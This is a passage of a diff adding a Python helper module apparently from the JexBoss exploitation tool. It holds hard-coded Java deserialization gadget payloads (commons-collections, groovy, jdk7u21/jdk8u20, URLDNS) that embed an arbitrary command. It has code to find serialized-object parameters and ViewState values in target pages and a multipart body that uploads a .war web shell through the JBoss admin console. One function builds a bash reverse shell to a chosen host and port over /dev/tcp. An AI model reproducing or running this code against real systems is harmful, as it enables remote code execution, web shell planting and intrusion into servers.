+\x23\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x25\x00\x10\x00\x09\x75\x71\x00\x7E\x00\x0D\x00\ +\x00\x01\x9B\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\ +\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\ +\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\ +\x6D\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\ +\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\ +\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\ +\x00\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x12\x4C\ +\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\x53\x6F\x75\x72\ +\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\ +\x00\x0B\x07\x00\x1A\x01\x00\x10\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\ +\x01\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\ +\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x0C\x75\x74\x69\ +\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\ +\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\ +\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\ +\x00\x00\x00\x06\x00\x01\x00\x00\x00\x26\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\ +\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\ +\x00\x16\x00\x10\x00\x09\x70\x74\x00\x07\x6A\x65\x78\x62\x6F\x73\x73\x70\x77\x01\x00\x78\x73\x7D\ +\x00\x00\x00\x01\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\x66\x6F\x72\ +\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x78\x72\x00\x17\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\ +\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\xDA\x20\xCC\x10\x43\xCB\x02\x00\ +\x02\x4C\x00\x05\x64\x75\x6D\x6D\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\ +\x62\x6A\x65\x63\x74\x3B\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\ +\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\ +\x72\x3B\x78\x70\x73\x72\x00\x29\x6A\x61\x76\x61\x2E\x62\x65\x61\x6E\x73\x2E\x62\x65\x61\x6E\x63\ +\x6F\x6E\x74\x65\x78\x74\x2E\x42\x65\x61\x6E\x43\x6F\x6E\x74\x65\x78\x74\x53\x75\x70\x70\x6F\x72\ +\x74\xBC\x48\x20\xF0\x91\x8F\xB9\x0C\x03\x00\x01\x49\x00\x0C\x73\x65\x72\x69\x61\x6C\x69\x7A\x61\ +\x62\x6C\x65\x78\x72\x00\x2E\x6A\x61\x76\x61\x2E\x62\x65\x61\x6E\x73\x2E\x62\x65\x61\x6E\x63\x6F\ +\x6E\x74\x65\x78\x74\x2E\x42\x65\x61\x6E\x43\x6F\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x53\x75\ +\x70\x70\x6F\x72\x74\x57\xD4\xEF\xC7\x04\xDC\x72\x25\x02\x00\x01\x4C\x00\x14\x62\x65\x61\x6E\x43\ +\x6F\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x50\x65\x65\x72\x74\x00\x29\x4C\x6A\x61\x76\x61\x2F\ +\x62\x65\x61\x6E\x73\x2F\x62\x65\x61\x6E\x63\x6F\x6E\x74\x65\x78\x74\x2F\x42\x65\x61\x6E\x43\x6F\ +\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x3B\x78\x70\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x73\x72\ +\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\ +\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\ +\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x03\x00\x02\x4C\x00\x04\x74\x79\x70\x65\x74\x00\ +\x11\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x0C\x6D\x65\x6D\ +\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\ +\x61\x70\x3B\x78\x70\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\ +\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ +\x00\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\ +\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\ +\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\ +\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\x61\x35\x61\x36\x30\x38\x71\x00\x7E\x00\x09\ +\x78\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7E\x00\x1D\x78") + + return payload + + +def generate_groovy1_payload(cmd): + # org.codehaus.groovy:groovy:2.3.9 + payload_groovy1 = ( + b"\xAC\xED\x00\x05\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\ +\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\ +\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\x4C\x00\ +\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\ +\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\x2F\x6C\ +\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x7D\x00\x00\x00\x01\x00\x0D\x6A\x61\x76\x61\ +\x2E\x75\x74\x69\x6C\x2E\x4D\x61\x70\x78\x72\x00\x17\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\ +\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\ +\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\ +\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x78\x70\x73\x72\x00\ +\x2C\x6F\x72\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\x2E\x72\x75\x6E\ +\x74\x69\x6D\x65\x2E\x43\x6F\x6E\x76\x65\x72\x74\x65\x64\x43\x6C\x6F\x73\x75\x72\x65\x10\x23\x37\ +\x19\xF7\x15\xDD\x1B\x02\x00\x01\x4C\x00\x0A\x6D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\ +\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x78\x72\x00\x2D\x6F\x72\ +\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\x2E\x72\x75\x6E\x74\x69\x6D\ +\x65\x2E\x43\x6F\x6E\x76\x65\x72\x73\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x10\x23\x37\x1A\xD6\ +\x01\xBC\x1B\x02\x00\x02\x4C\x00\x08\x64\x65\x6C\x65\x67\x61\x74\x65\x74\x00\x12\x4C\x6A\x61\x76\ +\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\x68\x61\x6E\x64\x6C\x65\x43\ +\x61\x63\x68\x65\x74\x00\x28\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\x75\x72\ +\x72\x65\x6E\x74\x2F\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x3B\x78\ +\x70\x73\x72\x00\x29\x6F\x72\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\ +\x2E\x72\x75\x6E\x74\x69\x6D\x65\x2E\x4D\x65\x74\x68\x6F\x64\x43\x6C\x6F\x73\x75\x72\x65\x11\x0E\ +\x3E\x84\x8F\xBD\xCE\x48\x02\x00\x01\x4C\x00\x06\x6D\x65\x74\x68\x6F\x64\x71\x00\x7E\x00\x09\x78\ +\x72\x00\x13\x67\x72\x6F\x6F\x76\x79\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x6F\x73\x75\x72\x65\x3C\xA0\ +\xC7\x66\x16\x12\x6C\x5A\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\ +\x6D\x61\x78\x69\x6D\x75\x6D\x4E\x75\x6D\x62\x65\x72\x4F\x66\x50\x61\x72\x61\x6D\x65\x74\x65\x72\ +\x73\x49\x00\x0F\x72\x65\x73\x6F\x6C\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4C\x00\x03\x62\x63\ +\x77\x74\x00\x3C\x4C\x6F\x72\x67\x2F\x63\x6F\x64\x65\x68\x61\x75\x73\x2F\x67\x72\x6F\x6F\x76\x79\ +\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x63\x61\x6C\x6C\x73\x69\x74\x65\x2F\x42\x6F\x6F\x6C\x65\x61\ +\x6E\x43\x6C\x6F\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3B\x4C\x00\x08\x64\x65\x6C\x65\x67\ +\x61\x74\x65\x71\x00\x7E\x00\x0B\x4C\x00\x05\x6F\x77\x6E\x65\x72\x71\x00\x7E\x00\x0B\x5B\x00\x0E\ +\x70\x61\x72\x61\x6D\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\ +\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x0A\x74\x68\x69\x73\x4F\x62\x6A\x65\x63\x74\ +\x71\x00\x7E\x00\x0B\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00") + if version_info[0] >= 3: + payload_groovy1 += (bytes(chr(len(cmd)), 'utf-8')) + payload_groovy1 += (bytes(cmd, 'utf-8')) + else: + payload_groovy1 += (chr(len(cmd))) + payload_groovy1 += (cmd) + + payload_groovy1 += (b"\x71\x00\x7E\x00\x13\x75\x72\ +\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\ +\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\ +\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\ +\x70\x76\x72\x00\x0C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x46\x69\x6C\x65\x04\x2D\xA4\x45\x0E\x0D\xE4\ +\xFF\x03\x00\x01\x4C\x00\x04\x70\x61\x74\x68\x71\x00\x7E\x00\x09\x78\x70\x70\x74\x00\x07\x65\x78\ +\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\ +\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x64\ +\x99\xDE\x12\x9D\x87\x29\x3D\x03\x00\x03\x49\x00\x0B\x73\x65\x67\x6D\x65\x6E\x74\x4D\x61\x73\x6B\ +\x49\x00\x0C\x73\x65\x67\x6D\x65\x6E\x74\x53\x68\x69\x66\x74\x5B\x00\x08\x73\x65\x67\x6D\x65\x6E\ +\x74\x73\x74\x00\x31\x5B\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\x75\x72\x72\ +\x65\x6E\x74\x2F\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\ +\x67\x6D\x65\x6E\x74\x3B\x78\x70\x00\x00\x00\x0F\x00\x00\x00\x1C\x75\x72\x00\x31\x5B\x4C\x6A\x61\ +\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\ +\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\x67\x6D\x65\x6E\x74\x3B\x52\x77\x3F\ +\x41\x32\x9B\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2E\x6A\x61\x76\x61\x2E\x75\ +\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\ +\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\x67\x6D\x65\x6E\x74\x1F\x36\x4C\x90\x58\x93\x29\x3D\ +\x02\x00\x01\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x78\x72\x00\x28\x6A\x61\x76\x61\ +\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\ +\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\x63\x6B\x66\x55\xA8\x2C\x2C\xC8\x6A\xEB\x02\x00\x01\x4C\ +\x00\x04\x73\x79\x6E\x63\x74\x00\x2F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\ +\x75\x72\x72\x65\x6E\x74\x2F\x6C\x6F\x63\x6B\x73\x2F\x52\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\ +\x63\x6B\x24\x53\x79\x6E\x63\x3B\x78\x70\x73\x72\x00\x34\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\ +\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\x65\x65\x6E\x74\x72\x61\ +\x6E\x74\x4C\x6F\x63\x6B\x24\x4E\x6F\x6E\x66\x61\x69\x72\x53\x79\x6E\x63\x65\x88\x32\xE7\x53\x7B\ +\xBF\x0B\x02\x00\x00\x78\x72\x00\x2D\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\ +\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\x63\ +\x6B\x24\x53\x79\x6E\x63\xB8\x1E\xA2\x94\xAA\x44\x5A\x7C\x02\x00\x00\x78\x72\x00\x35\x6A\x61\x76\ +\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\ +\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6E\x63\x68\x72\x6F\x6E\x69\x7A\ +\x65\x72\x66\x55\xA8\x43\x75\x3F\x52\xE3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\ +\x36\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\ +\x63\x6B\x73\x2E\x41\x62\x73\x74\x72\x61\x63\x74\x4F\x77\x6E\x61\x62\x6C\x65\x53\x79\x6E\x63\x68\ +\x72\x6F\x6E\x69\x7A\x65\x72\x33\xDF\xAF\xB9\xAD\x6D\x6F\xA9\x02\x00\x00\x78\x70\x00\x00\x00\x00\ +\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\ +\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\ +\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\ +\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\ +\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\ +\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\ +\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\ +\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\ +\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\ +\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\ +\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\ +\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\ +\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6E\ +\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x76\x65\x72\ +\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70") + + return payload_groovy1 + + +def generate_urldns_payload(url): + # based on Gabriel Lawrence gadget + payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\ +\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\ +\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\ +\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\ +\x52\x4C\x96\x25\x37\x36\x1A\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\ +\x49\x00\x04\x70\x6F\x72\x74\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x74\x00\x12\x4C\x6A\ +\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x04\x66\x69\x6C\x65\x71\ +\x00\x7E\x00\x03\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x03\x4C\x00\x08\x70\x72\x6F\x74\x6F\ +\x63\x6F\x6C\x71\x00\x7E\x00\x03\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x03\x78\x70\xFF\xFF\xFF\ +\xFF\xFF\xFF\xFF\xFF\x74\x00") + if version_info[0] >= 3: + payload += (bytes(chr(len(url)), 'utf-8')) + payload += (bytes(url, 'utf-8')) + else: + payload += (chr(len(url))) + payload += (url) + payload += (b"\x74\x00\x00\x71\x00\x7E\x00\x05\x74\x00\x05\x68\x74\x74\x70\x73\x70\x78\x74\x00\x19\x68\x74\ +\x74\x70\x73\x3A\x2F\x2F\x74\x65\x73\x74\x2E\x6A\x65\x78\x62\x6F\x73\x73\x2E\x69\x6E\x66\x6F\x78") + + return payload + + + + +def get_payload_gadget(gadget_type, cmd): + + return { + + 'commons-collections3.1': generate_commons_collections31_payload(cmd), + 'commons-collections4.0': generate_commons_collections40_payload(cmd), + 'groovy1': generate_groovy1_payload(cmd), + 'jdk7u21': generate_jdk7u21_payload(cmd), + 'jdk8u20': generate_jdk8u20_payload(cmd), + 'dns': generate_urldns_payload(cmd), + + }.get(gadget_type, generate_commons_collections31_payload(cmd)) + + +def get_link_for_post(page): + """ + Search for link to post data in the page + :param page: The code of the page for search in it + :return: The link for post method or None + """ + page = str(page).replace("\\n", "\n") + # stage 1 - search for form-urlencoded + for line in page.strip().split('\n'): + # this is the post line + if 'application/x-www-form-urlencoded' in line: + tokens = line.strip().split(" ") + for t in tokens: + if 'action' in t and len(t) > 10: + return t.split(">")[0][8:-1] + + # stage 2 - search for any post method + for line in page.strip().split('\n'): + # this is the post line + if 'method=\"post\"' in line.lower(): + tokens = line.strip().split(" ") + for t in tokens: + if 'action' in t and len(t) > 10: + return t.split(">")[0][8:-1] + + return None + + +def get_serialized_obj_from_param(page, param): + """ + Get content of a param that contains a java serialized object (base64 gziped or only base64 of raw) + :param page: The page source code for search in it + :param param: The param that will be searched + :return: Param content with java serialized object or None + """ + page = str(page).replace("\\n", "\n") + full_param = "name=\""+param+"\"" + for i in page.strip().split('\n'): + + tokens = i.strip().split(" ") + + for t in tokens: + # get param value + if full_param in t: + index = tokens.index(full_param) + if 'value=\"' in tokens[index+1]: + obj = tokens[index+1].split("\"")[1] + if obj.startswith("H4sI") or obj.startswith("rO0"): + #return last_link, obj + return obj + elif tokens[index+2]: + obj = tokens[index+2].split("\"")[1] + if obj.startswith("H4sI") or obj.startswith("rO0"): + #return last_link, obj + return obj + return None + + +def get_list_params_with_serialized_objs(page): + """ + Search for parameters that contain a java serialized object + :param page: The page source code for search in it + :return: List of parameters found + """ + page = str(page).replace("\\n", "\n") + list_params = [] + + for i in page.split('\n'): + + tokens = i.strip().split(" ") + + for ind in range(0, len(tokens)): + + t = tokens[ind] + + if 'value=\"H4sI' in t or 'value=\"rO0' in t: + + if 'name=\"' in tokens[ind-1] or 'id=\"' in tokens[ind-1]: + param = tokens[ind-1].split("\"")[1] + if param not in list_params: + list_params.append(param) + + return list_params + + +def get_viewstate_value(page): + """ + Find for content of the viewState param in source code + :param page: The code of the page for search in it + :return: The content of the viewstate param or None + """ + page = str(page).replace("\\n", "\n") + full_param = "name=\"javax.faces.ViewState\"" + + for i in page.strip().split('\n'): + + tokens = i.strip().split(" ") + + for t in tokens: + + # get param value + if full_param in t: + index = tokens.index(full_param) + if 'value=\"' in tokens[index+1]: + obj = tokens[index+1].split("\"")[1] + return obj + elif tokens[index+2]: + obj = tokens[index+2].split("\"")[1] + return obj + + return None + + +def get_url_base(url): + """ + Get the Authority from an URI, according with rfc3986 + :param url: The uri provided by the user in -u param + :return: the authority from the uri + """ + if '://' in url: + protocol = url.split('://')[0] + '://' + else: + protocol = '' + + url_base = protocol+url.split('://')[-1].split('/')[0] + + return url_base + + +def get_boundary_admin_console(jboss_version, state, payload): + """ + Get boundaty for post in admin-console + :param jboss_version: jboss version. Supported: 5 and 6 + :param state: content of the viewState + :param payload: the .war to deploy in jboss + :return: boundary ready to send in post + """ + boundary = "-----------------------------551367293438156646377323759\r\n" + if jboss_version == 6: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += "createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws4.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------551367293438156646377323759--\r\n" + return data + elif jboss_version == 5: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += "createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws4.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------551367293438156646377323759--\r\n" + return data + + +def url_encode(text): + """ + Encode text to URL Encode + :param text: text to be encoded + :return: encoded text + """ + if version_info[0] >= 3: + return quote(text) + else: + return urllib.quote_plus(text) + + +def generate_cmd_for_runtime_exec(cmd, host, port, is_win): + + # if is only one command (or dns query) + if cmd is not None and len(cmd.strip().split(" ")) == 1: + return cmd + # if reverse shell were chosen + elif host is not None and port is not None: + if not is_win: + cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/%s/%s<&1" % (host, port) + else: + if is_win: + cmd = "cmd.exe /C %s" % cmd.replace(' ', ' ') + else: + cmd = "/bin/bash -c %s" % cmd.replace(' ', ' ').replace(' ', '${IFS}') + + return cmd + + +def get_html_redirect_link(page): + """ + Check if the page souce contains a redirect in html and extrat it + :param page: the page source code + :return: link to redirect or None + """ + if 'http-equiv=\"refresh\"' in page.lower(): + + page = str(page).replace("\\n", "\n") + # each line + for line in page.split('\n'): + + if 'http-equiv=\"refresh\"' in line.lower(): + tokens = line.strip().split("\"") + # each token + for t in tokens: + if "url=" in t.lower(): + return t.lower().split('url=')[-1] + else: + return None + + +def shows_payload(payload, gadget_type): + jexboss.print_and_flush(GREEN + "\n------------------------------------------------------------" + ENDC) + jexboss.print_and_flush(GREEN + " [*] Payload (%s):\n" %gadget_type+ ENDC) + jexboss.print_and_flush(url_encode(payload)) + jexboss.print_and_flush(GREEN + "------------------------------------------------------------\n" + ENDC) + diff --git 